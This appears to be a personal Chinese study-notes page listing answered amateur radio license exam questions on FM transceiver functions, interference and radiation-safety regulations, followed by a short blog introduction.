  • 下列哪一个缩写经常在无线电工程文章中用来代表各种类型的无线电波?RF
  • 收发信机面板上或设置菜单中的符号VOX代表什么功能?发信机声控,接入后将根据对话筒有无语音输入的判别自动控制收发转换
  • 收发信机中的PTT是指什么信号?按键发射,有信号(一般为对地接通)时发射机由等待转为发射
  • 收发信机面板上或设置菜单中的符号SQL代表什么功能?静噪控制,检测到接收信号低于一定电平时关断音频输出
  • 有些调频接收机的参数设置菜单有NFM和WFM两种选择。它们的含义是:NFM为窄带调频方式,适用于信道带宽25kHz/12.5kHz的通信信号;WFM为宽带调频方式,适用于接收信道带宽180kHz左右的广播信号
  • 缩写DTMF指的是:双音多频编码,由8个音调频率中的两个频率组合成的控制信号,代表16种状态之一,用于遥控和传输数字等简单字符
  • 缩写CTCSS指的是:亚音调静噪,即从67-250.3Hz的38个亚音调频率中选取一个作为选通信号,代表38种状态之一,接收机没有收到特定的选通信号时自动关闭音频输出
  • 关于是否可以在FM话音通信时单凭接收机听到对方语音的音量大小来准确判断对方信号的强弱,正确答案及其理由是:不能。因为鉴频输出大小只取决于射频信号的频偏,而且正常信号的幅度会被限幅电路切齐到同样大小
  • 用设置在NFM方式的对讲机接收WFM信号,其效果为:可以听到信号,但当调制信号幅度较大、音调较高时会发生明显非线性失真
  • 调频接收机没有接收到信号时,会输出强烈的噪声。关于这种噪声的描述是:由天线背景噪声和【机内电路噪声】的随机频率变化经鉴频形成,其大小与天线接收到的背景噪声幅度无关
  • 如果业余中继台发射机被断断续续的干扰信号所启动,夹杂着不清楚的语音,根据覆盖区内其他业余电台的监听,确定中继台上行频率并没有电台工作。则:可能是中继台附近的两个其他发射机的强信号在中继台上行频率造成了互调干扰
  • 如果对方报告你的调频电台发射的信号听起来失真严重、可辨度差,可能的原因是:三项都可能
  • “全频偏”和“半频偏”的选择,其表示的意义是:分别表示信道间隔为25kHz或者12.5kHz
  • 家用微波炉一般的工作频带是:UHF(特高频)
  • 移动车载电台通常使用的电源电压是?约12伏特
  • 一般环境条件下允许持续接触的“安全特低电压”为:24V
  • 要防止业余HF发射机的杂散发射干扰天线附近的电话机,应该在电话机和电话线之间之间串联:截止频率不高于1MHz的低通滤波器
  • 按照我国国家标准《电磁辐射防护规定》,凡其功率大于豁免水平(3MHz以上等效辐射功率100瓦)的一切电磁波辐射体的所有者,必须:向所在地区的环境保护部门申报、登记,并接受监督
  • 我国国家标准《电磁辐射防护规定》规定电磁辐射公众照射导出限值中,对环境电磁辐射场强一天24小时内任意6分钟内的平均值要求最严格的频率范围为:30MHz- 3GHz

上穷碧落 以守厚土

By exploring other worlds, we safeguard this one .
-Carl sagan

这是这个网站的开始

我会在这个网站记录一些学习心得,实际上是对自己学习内容的一个整理。

不进行交流或者提供解决办法。